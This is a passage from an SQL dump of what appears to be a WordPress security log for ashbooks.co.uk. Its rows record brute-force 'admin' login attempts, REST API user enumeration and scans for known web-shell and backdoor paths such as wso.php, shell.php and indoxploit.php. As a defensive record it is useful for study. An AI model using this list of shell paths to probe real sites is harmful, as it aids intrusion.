1637299947.1372,70,'qjn6DdPyW8seQozNpmOIcZRK','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('114.119.131.93',1920435037,'',0,1637302372.3199,55,'T0ZkyVfdI4Ko5va1COQ6YPW7','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('186.67.132.252',3124987132,'admin',0,1637302799.8335,7,'5IEvbGLyuCY8hMfS3tdP0Uae','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.153.166',2813106598,'admin',0,1637304556.4623,7,'OeHYx9qGa45RcVFytP2KC6QM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.74.197.132',1833616772,'admin',0,1637308089.0077,7,'W2adSEmIiqsfU4oOHy8tTJ9X','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.185.231.167',347727783,'',0,1637308979.3429,55,'c9WNwKGEs2AQjpOrUMd8P0uJ','','19|0|0|0|www.ashbooks.co.uk/wp-includes/css/modules.php'),('20.185.231.167',347727783,'',0,1637308986.7793,55,'fwWiyUSnamphXBjqI1PFAstO','','19|0|0|0|www.ashbooks.co.uk/wso.php'),('20.185.231.167',347727783,'',0,1637308999.8973,55,'cikLJGn5KazShRtF8dDPe2Xx','','19|0|0|0|www.ashbooks.co.uk/wp-content/plugins/upspy/index.php'),('20.185.231.167',347727783,'',0,1637309002.9019,55,'OJi2Wz3BjqxAvmgkTX0tbRoc','','19|0|0|0|www.ashbooks.co.uk/wp-content/plugins/ubh/index.php'),('20.185.231.167',347727783,'',0,1637309006.5038,55,'ba2mh61jzgD4EdYyWlCof95G','','19|0|0|0|www.ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.185.231.167',347727783,'',0,1637309006.5558,10,'ba2mh61jzgD4EdYyWlCof95G','','707|0|0|0|www.ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php'),('20.185.231.167',347727783,'',0,1637309009.0913,100,'Rkb8qEFoJm4N1LQPT3WcilO2','','13|0|0|0|www.ashbooks.co.uk/wp-content/plugins/xichang/x.php'),('20.185.231.167',347727783,'',0,1637309016.1286,55,'avKzJu9RUjXQeY04Vlickmq7','','19|0|0|0|www.ashbooks.co.uk/wp-admin/shapes.php'),('20.185.231.167',347727783,'',0,1637309018.8071,55,'oHR6vWtdxIM9LhGf0wEspiYO','','19|0|0|0|www.ashbooks.co.uk/olux.php'),('20.185.231.167',347727783,'',0,1637309025.5128,55,'lV9P8cMrBTg7a0WxhtIFCDms','','19|0|0|0|www.ashbooks.co.uk/indoxploit.php'),('20.185.231.167',347727783,'',0,1637309036.5562,55,'JWvGbhnYord6CLODRmTPiA8l','','19|0|0|0|www.ashbooks.co.uk/up.php'),('20.185.231.167',347727783,'',0,1637309038.9347,55,'hFP1dCXQYDa9pBibv2MOHgtw','','19|0|0|0|www.ashbooks.co.uk/upload.php'),('20.185.231.167',347727783,'',0,1637309043.5192,55,'kj7N4lctW0fweQ1HTGAp8KmI','','19|0|0|0|www.ashbooks.co.uk/shell.php'),('20.185.231.167',347727783,'',0,1637309046.9530,55,'yOkxe9t8F6XJSgGjI40fcw3r','','19|0|0|0|www.ashbooks.co.uk/wp-admin/network/wp-footer.php'),('20.185.231.167',347727783,'',0,1637309049.7021,55,'5Ss9UDHo7aNiz0ZFwh1fR6Gl','','19|0|0|0|www.ashbooks.co.uk/wp-info.php'),('20.185.231.167',347727783,'',0,1637309052.7519,55,'k9hpAvNg6uwDBFOJWfeMy8ZY','','19|0|0|0|www.ashbooks.co.uk/wp-content/vuln.php'),('20.185.231.167',347727783,'',0,1637309055.1164,55,'PHXSCycaAL6dq9wnEOibQ4IR','','19|0|0|0|www.ashbooks.co.uk/upel.php'),('20.185.231.167',347727783,'',0,1637309056.9383,55,'6A7NCzKRum2ZY9w1gkdBlvj3','','19|0|0|0|www.ashbooks.co.uk/wp-content/plugins/ppus/up.php'),('20.185.231.167',347727783,'',0,1637309058.9314,55,'datLb5KxGclZpe1jPYOFv0ou','','19|0|0|0|www.ashbooks.co.uk/098.php'),('20.185.231.167',347727783,'',0,1637309063.2465,55,'xvm3Rnw5DXcTzoHdA9FglrL2','','19|0|0|0|www.ashbooks.co.uk/V5.php'),('20.185.231.167',347727783,'',0,1637309076.9191,55,'X637fjWsZACmBrnKSVG5qMoT','','19|0|0|0|www.ashbooks.co.uk/new_license.php'),('20.185.231.167',347727783,'',0,1637309081.3055,55,'wjBh4TCogHAFDKJv0slNWey8','','19|0|0|0|www.ashbooks.co.uk/wp-content/plugins/theme-configurator/mini.php'),('20.185.231.167',347727783,'',0,1637309082.8395,55,'3opDwa8eIkb9d5PQXE0Tl6Fu','','19|0|0|0|www.ashbooks.co.uk/wp-content/plugins/widget-logic/mini.php'),('159.203.115.159',2680910751,'admin',0,1637311582.0288,7,'nRIexp2GVWMcoLqPd8AyDasw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('65.21.234.114',1091955314,'',0,1637312324.8063,70,'twTRk8XYJfNxBFoq6aWc0uh1','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('5.9.55.176',84490160,'admin',0,1637313301.3435,7,'rB8EjgkW0xFXPuoc9GRpJQK7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('102.157.84.33',1721586721,'admin',0,1637313570.9061,7,'XO24NgzSbFHmjK1L9EaUQ5fu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('102.157.84.33',1721586721,'admin',0,1637313596.6819,7,'1y7dNj94SYRwOVTpibLrUIlC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('102.157.84.33',1721586721,'admin',0,1637313623.1647,7,'ilxZOAp0PoQg4qskYtTNUJEX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('102.157.84.33',1721586721,'admin',0,1637313653.2973,7,'Qoh53bfkCKzOdjRslm69SJqu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('102.157.84.33',1721586721,'admin',0,1637313683.6257,7,'qI5TVdhEKZ4bCJ6o2trRW7gz','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('102.157.84.33',1721586721,'',0,1637313683.6938,10,'qI5TVdhEKZ4bCJ6o2trRW7gz','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('102.157.84.33',1721586721,'',0,1637313686.7770,50,'3cO6BdFoJMSti1hHDLr9CbQm','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.143',757638799,'admin',0,1637315225.4617,7,'8W79XFit4LNYpDZGg0SRlVBf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.75.15.189',860557245,'admin',0,1637317316.1656,7,'V4eTElv1xd7UXRHzpBuGA26i','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('187.49.234.46',3140610606,'admin',0,1637319167.2880,7,'Tn8kVBFxjc9uoHaPrgWv2eql','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.15.160.22',856662038,'admin',0,1637321004.2082,7,'0ZrcjPahFKdWmv7zQ2sYBGDJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.160.194.117',396411509,'admin',0,1637323221.6485,152,'P3XFncGkITbRE7r1m4CH90Nj','','0|0|0|0|ASHBOOKS.CO.UK/xmlrpc.php'),('183.91.11.75',3076197195,'ashbooks',0,1637323271.0544,152,'8eWDjofdGXJhRz2ZONqVTrFI','','0|0|0|0|ASHBOOKS.CO.UK/xmlrpc.php'),('89.46.105.158',1496213918,'admin',0,1637323523.6498,152,'SX5DdiJsMI0av37Z2ToL4uCc','','0|0|0|0|ashbooks.co.uk/xmlrpc.php'),('107.172.227.152',1806492568,'admin',0,1637324251.6030,7,'zFcy1pmHxVvISdl5CPo2hJU8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('122.128.106.186',2055236282,'admin',0,1637324634.5106,7,'GCnWk84aw0XJ9EQ3YROM2jFA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.41.204.82',1730792530,'admin',0,1637328633.0653,7,'ZbJM5YQzp6Hc87mrFN3tawWg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('148.66.129.233',2487386601,'admin',0,1637330401.6747,7,'WhVjoUMTwad1lcOKxXYB6iCQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('144.76.199.105',2420950889,'admin',0,1637332317.4239,7,'MEoTiVekwYcOl7HuR8FNxGgh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.197.12.140',2328169612,'admin',0,1637334159.8173,7,'jMtc79nGQizJhdWmSFbDXsPp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('142.93.79.34',2388479778,'admin',0,1637335968.6067,7,'4vCNPutf7aLOloH3EeDs5ipK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('207.180.213.165',3484734885,'admin',0,1637337707.4587,7,'BZP7rTm2jSq1VCfEFXALixJw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('217.9.143.94',3641282398,'admin',0,1637339506.7490,7,'gwtH4hKl6IyaEUTexCz2d9Ao','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.186.18',3497114130,'admin',0,1637343073.7888,7,'EjTA5JhGolm9P83UdyfLnibt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('139.162.179.198',2342695878,'',0,1637343320.8777,55,'1drQtx2ZwHs0oplgA8keYDhv','','19|0|0|0|ashbooks.co.uk/wp-includes/js/tinymce/plugins/lists/lists/index.php'),('162.55.85.219',2721535451,'',0,1637346957.9590,55,'tPkh40IfyJmOGKRHCsBEZV3n','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('204.12.198.244',3423389428,'admin',0,1637347957.8094,7,'EqFmHgNMRLPAe1oBh8vCcG5d','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('67.205.11.6',1137511174,'admin',0,1637348792.1931,7,'SCzmRp1HYLTd9KAOU6bXEovB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.144.187.104',3331373928,'admin',0,1637349647.1352,7,'5L3dQxj6RiGD2rYtO4cwa8A0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.63.173.50',3107958066,'admin',0,1637350455.4400,7,'6UCDb5kzPYKVvWRHltE9y48p','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.145',765333393,'',0,1637350849.2888,55,'vcQJrzVdY59otySF1COBgnMD','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('35.241.123.16',603028240,'admin',0,1637351451.8111,7,'pOn02cPGeJDUZKdS439XmlWI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.187.170.168',1505471144,'',0,1637351987.9573,70,'V9R45D8NQBCnsAqzEtgjH0Le','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users'),('81.88.52.175',1364735151,'admin',0,1637352425.3501,7,'pzohw1eE5OMTkJNWUj7BPxm4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('77.77.212.90',1296946266,'admin',0,1637353496.8247,7,'nJbWs6LToZXwR9MB4gk2VG3y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.227.155.85',1138989909,'admin',0,1637354572.4549,7,'fvUexWZwNAtyunbB8FpHEPhS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.192.52',2916401204,'admin',0,1637355641.6167,7,'kLqmYlXZt8voKuyTD3Qph19G','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('96.125.171.153',1618848665,'admin',0,1637356705.0989,7,'f4MF1eER7rtz9WVGuiAjpPag','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('35.202.150.249',600479481,'admin',0,1637357849.8696,7,'v1LDY0gbru4qFzBmpPc9RQEZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.111.126.32',1081048608,'admin',0,1637360179.1129,7,'yvGP3ud8IMleb7EXmTD1RJ6t','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.131.88',1920435032,'',0,1637360390.8522,55,'zrfI4BbeKYtj5Sxv3MyknDJH','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('194.246.93.146',3270925714,'',0,1637360519.5356,55,'8gBqehPtZQ46lnFYyRG0Hi9M','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/Enigma2.php'),('194.246.93.146',3270925714,'',0,1637360521.4713,55,'ZqXM9uHgskpB07dE5UOSroAN','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/abtest/abtest_admin.php'),('194.246.93.146',3270925714,'',0,1637360521.7950,55,'diUplT3DFwHM6Yz91oI8KkQc','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/advanced-custom-fields/core/actions/export.php'),('194.246.93.146',3270925714,'',0,1637360522.6582,55,'lvoWXRtupg8jmi6dE4Ax0ZLC','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php'),('72.167.53.106',1218917738,'admin',0,1637361292.8488,7,'UCkOh0rNesp6qPli7oyIZjuc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('13.94.249.188',224328124,'admin',0,1637363497.6061,7,'lg7LBY025MXju4nQqmyFtJRD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.113.217.22',1047648534,'admin',0,1637364521.3654,7,'nAEIsjY690RDvM4w1Jkcf2Sb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.146.44.214',1385311446,'admin',0,1637365550.8679,7,'fLJK8N3mXSUxnRetbvrFyBaH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.240.27.242',2733644786,'admin',0,1637366595.0425,7,'1jTIVydKwAxhRbc9EW7lvrUa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('177.55.111.14',2973200142,'admin',0,1637368751.6370,7,'egYjxOZ0MpVQ3INyzSc5AGPi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('202.189.179.194',3401429954,'admin',0,1637369767.8108,7,'XnwbaV6lYsR3NfuWhgF5B2Tk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.94.163.77',2606670669,'admin',0,1637370850.5846,7,'68I5RfbyPnJzihldgaeDvECG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('165.227.230.191',2783176383,'admin',0,1637371940.4349,7,'dTl2fwheqYkLEvtFrJKm40QW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.205.36.137',1137517705,'admin',0,1637373078.7112,7,'NW85xdvC3wQy2zAVJu7FIePk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.144.253.38',1737555238,'admin',0,1637374367.8878,7,'Rx4ezWctCTSyV8puaXPHQsFL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.144.180.93',3331372125,'admin',0,1637375129.3050,7,'VLkwmCS4ul9K8TMIzcE5xsFG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.151.91',2813106011,'admin',0,1637375592.7001,7,'5EWauzHZPGkXeOFJibtNMSK8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.15.232.195',1729095875,'admin',0,1637377966.9685,7,'gWexVfvrdbOcpEjR09AL7a6B','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('8.130.55.145',142751633,'admin',0,1637379107.6387,7,'0mAPagU9V1tDoEQYJb2KIcij','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('217.79.178.53',3645878837,'ashbooks',0,1637380055.4860,51,'KhcAdyOrE3Wgsowl0GpjkqaM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.182.159.89',1052155737,'',0,1637381471.7607,55,'FOL3C1VJ2hvNYRrXG54ApMEc','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/autoptimize/fw.php'),('34.92.58.160',576469664,'admin',0,1637381566.7528,7,'8WKIBmtpsijJGLvDU2nTXgEa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.225.182',1159651766,'admin',0,1637381626.9699,7,'JqYoZtrkQG6ISelOc8bCF4a5','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('162.240.16.237',2733641965,'admin',0,1637382765.7816,7,'t4pLQJXzDOhWywUNmPBCHYKE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.147.48.161',580071585,'admin',0,1637383848.5859,7,'H1FOaktYAUXRgySjDdMoQKcu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('147.182.192.77',2478227533,'admin',0,1637386540.3173,7,'nkAcHM3RdSB107FqmjUWreY2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.28.49.63',1729900863,'admin',0,1637387914.9972,7,'ZNFkApK5Yc86g9GX3m4Q2ywH','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('163.178.170.141',2746395277,'admin',0,1637389278.1305,7,'Vgauj8NPZUvoFhtKlTsCbSen','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.114.144.212',1735561428,'admin',0,1637390593.1969,7,'vaKSNG7iprXWIDn8TZxAhOCu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.159.224.34',1738530850,'',0,1637393491.9276,55,'SFNDycZJnhg3TAYovi2braqC','','19|0|0|0|ashbooks.co.uk/new-index.php'),('103.159.224.34',1738530850,'',0,1637393494.9421,55,'Myna79EudcAFULmCOPkiNqDr','','19|0|0|0|ashbooks.co.uk/1index.php'),('103.159.224.34',1738530850,'',0,1637393498.3164,55,'FLksjznAWwgVmZ6x9u3yi0aX','','19|0|0|0|ashbooks.co.uk/2index.php'),('103.159.224.34',1738530850,'',0,1637393502.2736,55,'8CRjZwUBhVMxos6av2O3putf','','19|0|0|0|ashbooks.co.uk/sindex.php'),('103.159.224.34',1738530850,'',0,1637393506.7194,55,'WAs3OzNvlH57VmEw02ufR9gJ','','19|0|0|0|ashbooks.co.uk/old-index.php'),('103.159.224.34',1738530850,'',0,1637393506.7442,10,'WAs3OzNvlH57VmEw02ufR9gJ','','707|0|0|0|ashbooks.co.uk/old-index.php'),('103.159.224.34',1738530850,'',0,1637393510.2009,55,'lf0e3JDrNT4pXajxZ5CmvKnd','','19|0|0|0|ashbooks.co.uk/baindex.php'),('103.159.224.34',1738530850,'',0,1637393513.5903,55,'y4YKecOpkMvzna9EhXB7VTwL','','19|0|0|0|ashbooks.co.uk/wikindex.php'),('159.203.115.159',2680910751,'admin',0,1637393538.5694,7,'2ZSwrNgVxFGMJp7nDAIYQREe','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.236.136.5',2917959685,'admin',0,1637394718.7288,7,'mfHq90VA7CTQeMUWoP6yXYiE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('201.149.55.226',3381999586,'',0,1637395628.4652,55,'elR1xF8u6AqEhDCtYGpZH9ob','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-members-master/wp-tag.php'),('69.163.224.119',1168367735,'admin',0,1637397751.4490,7,'NYDQ0WfAFm8dPtuIpMevxwqU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.221.37.58',1541219642,'admin',0,1637399376.5577,7,'RLjqSasg8yM9hQ3UKdCXekmO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.46.208.147',3324956819,'admin',0,1637400311.0500,7,'Rywxh0ecWZdBDMGTOASiVHuK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.111.197.125',1601160573,'admin',0,1637400850.7558,7,'QpRyJNOdwYg1hjSXc8ACoBke','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.225.29.51',1088494899,'admin',0,1637402491.5438,7,'sHhabOGZMoU3gLwIJQBdq4tj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.133.129.13',2609217805,'admin',0,1637404177.7463,7,'1lmupWPUZE84HtGjcOQvxK3I','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.65.238.248',2671898360,'admin',0,1637405495.5805,7,'9aJ3tbipdkjuYxVyBe0URAhm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('88.198.22.11',1489376779,'admin',0,1637408143.0190,7,'TGpVMuXmf9nhW16kbLwgdQKc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('80.249.174.66',1358540354,'admin',0,1637409427.5736,7,'jp6DBgTulvNGoEFb5JzY70AQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.203.115.159',2680910751,'admin',0,1637410863.0355,7,'65LPOE4CatvqWxUdyVcopS1Z','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.95.172',2650103724,'admin',0,1637412245.7525,7,'zv5mQHMsNuZTb8pnFtIVUShD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('210.13.75.122',3524086650,'admin',0,1637415472.7259,7,'ZA4k8YUfi3gHbVc7EBILJMjn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.201.199',1608108487,'admin',0,1637416453.4627,7,'2KwBj765GUTJzFntaqMQZeAh','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.31.0.242',2954821874,'admin',0,1637417393.9408,7,'goCsv6An1tIdTDQ39UpXNVk7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.208.152.234',2916129002,'admin',0,1637417919.4939,7,'svtF9EYjDI5MrOgBkVl0pKoa','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('52.44.101.206',875324878,'admin',0,1637418240.9981,7,'rhTOpDGzNH5KfxL8vB9Ec1Vn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.215.197',2994788293,'admin',0,1637419058.7963,7,'g96nf15xSEIULFQOuvAHeZwp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('78.47.116.216',1311732952,'admin',0,1637419829.5406,7,'BL3Ky6C9f4ERwmPIsu0MrDAZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.207.146.189',1506775741,'admin',0,1637420394.2856,7,'LOVe5StkaUjB1bQpvsNDY7Zc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.50.199.194',3107112898,'admin',0,1637421046.4823,7,'2eBsjA65Gvf0pE8CtmZhN7ql','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.1.143',3164995983,'admin',0,1637421695.1032,7,'gA3dSEhVQmIOF0X2HUT5kybC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('147.182.136.145',2478213265,'',0,1637422165.9012,70,'0PGlJe6cpMA3SxXkuIoaQvnN','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('49.249.232.74',838461514,'admin',0,1637422455.8153,7,'MdoXSwfaKUI6LpQT8N2ekmg7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('118.27.30.151',1981488791,'admin',0,1637423194.1903,7,'GXSVIpgFs9CRtD5zJwi0o8Kj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.133.129.13',2609217805,'admin',0,1637423832.1062,7,'GyCxaAOhlMFuevoIm6JrWKw5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.172.228.84',1806492756,'admin',0,1637424116.6363,7,'g8dFsjM3vptOlDP0SXR7LYIJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('96.125.171.153',1618848665,'admin',0,1637424599.1432,7,'QlAP7KhkV0in3RuEUIsrJaFx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.143',757638799,'admin',0,1637425421.8693,7,'Op1DV0RKSrs52bhxtHEwYezF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.110.251',2650107643,'admin',0,1637426213.6712,7,'829kfNtiWrTvCXa1peSBUnu5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.144.72',1608093768,'admin',0,1637427109.3228,7,'oSQYsE1fTGciFbNP6CZDaJru','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.236.126.239',1760329455,'admin',0,1637427894.1213,7,'i5nDmqBV3CW6h9pgQJo8PSlE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.250.226',2650143458,'admin',0,1637429096.4663,7,'1Okf7GL5btPIS6zreJAd9sCQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.223.50.44',2682204716,'',0,1637429646.1160,70,'xieomuz3PB598kpIvnr2l0KV','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('162.240.16.237',2733641965,'admin',0,1637429942.5817,7,'seRSTocImEqV0DHzwjun6Q1C','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('80.249.174.66',1358540354,'admin',0,1637432308.4249,7,'tZNOR4qSQ19pTLvuIg3n2cMd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.133.129.13',2609217805,'admin',0,1637433032.3019,7,'lepfI7aPrnm6KDsSgRWobAXd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.216.221.91',1608047963,'admin',0,1637434513.6923,7,'O3IqNH5a2v4FMz8uCicjgGUx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.113.217.22',1047648534,'admin',0,1637435387.4391,7,'fLcvdKrSwOCo3NX1eImlaDk5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.87.200.193',1834469569,'admin',0,1637436179.9623,7,'9gzaYOtrA4cTobB6uWDX3nNj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.182.159.89',1052155737,'',0,1637436784.9727,55,'gOwbSTuU701frQCM26evNsJh','','19|0|0|0|ashbooks.co.uk/css/fw.php'),('206.189.111.216',3468521432,'admin',0,1637436918.7850,7,'ehgGKf7BiVPSAx3FTDja942I','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.113.111.54',1567715126,'admin',0,1637437643.9246,7,'OLuNvTKHwE27ZzCSjBXWhDkM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.74.197.132',1833616772,'admin',0,1637438266.5840,7,'86Lc5mDANdarxCy0ujQboRfK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('187.51.127.28',3140714268,'admin',0,1637439106.7378,7,'u9VZtfBiK4jDgOQ6ecSdYrvP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.44.101.206',875324878,'admin',0,1637439726.7725,7,'9vYIyxZCj7AuQXN8HW2bPd54','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.190.211',2160574163,'admin',0,1637440345.8679,7,'JpXz3iB05CqjT6rgx89UQcRy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.163.133.151',3265496471,'admin',0,1637440971.7405,7,'yZ3YL6tnEjdv07c1A89mKsrx','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.219.236.197',1541139653,'admin',0,1637442410.8167,7,'qGaUSorYO4kC1vhWsjERPyiL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('87.118.116.103',1467380839,'',0,1637443111.6767,70,'QWn4BguhNvkcYz3CUVF2lfry','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/1'),('171.25.193.78',2870591822,'',0,1637443115.4248,70,'lJ6TawbdYyqxA2V1WFCpths0','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/2'),('185.220.101.47',3118228783,'',0,1637443116.8257,70,'b0OHzvVB28J3XdSyuMQwekGT','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/3'),('199.195.253.184',3351510456,'',0,1637443118.3562,70,'pP1de6FrsNDEtL3fwZBVH79j','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/4'),('89.163.252.30',1503919134,'',0,1637443119.6062,70,'UDFkqRoOapCidmP6JWHeYE1j','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/5'),('143.198.179.234',2412164074,'admin',0,1637443300.6169,7,'U0xgB2Fen1JbVOXSCHdAYr3L','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('155.133.129.13',2609217805,'admin',0,1637443978.8775,7,'WynUQpDlEhg5ZYXcIwKr6uMS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('202.172.26.53',3400276533,'admin',0,1637444687.8702,7,'SU3raBtDQ4XMiyxcGu5TIREo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.126.219.43',3112098603,'admin',0,1637445399.3787,7,'D6zpoaCdWBOEAwGXUMTLJ1e5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('200.170.156.249',3366624505,'admin',0,1637447179.1489,7,'anfWpmoSvAsHch5xtiD8UBlg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'ashbooks',0,1637447844.8540,51,'bEDCn4R1eG9WoYwAfKmXc7BN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.175',1364735151,'admin',0,1637447962.5242,7,'frNCiEaJkYmT6BR2gXFH9yG1','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('65.108.51.66',1097610050,'admin',0,1637448606.4166,7,'EYaz1P23Fi6TBnqOeNCrJL5G','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('198.46.212.102',3324957798,'admin',0,1637448647.3575,7,'ie6dqRs3EBmrFb5kvuNcIngf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('39.105.188.249',661241081,'admin',0,1637449308.9011,7,'ycb6aXJzTYOl34SVhmDpZNML','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.160.8',3497107464,'admin',0,1637450657.0490,7,'iRwYz80HkUhnG5Bf7rLDPs1y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.145',765333393,'',0,1637450873.8541,55,'ZI0s1i3QLuDR4zUSnerHtMYw','','19|0|0|0|ashbooks.co.uk/wp-includes/wp-class.php'),('94.23.83.103',1578586983,'admin',0,1637451387.6433,7,'rUsugoz17WHqjnLv0EQmMDkt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'ashbooks',0,1637452818.2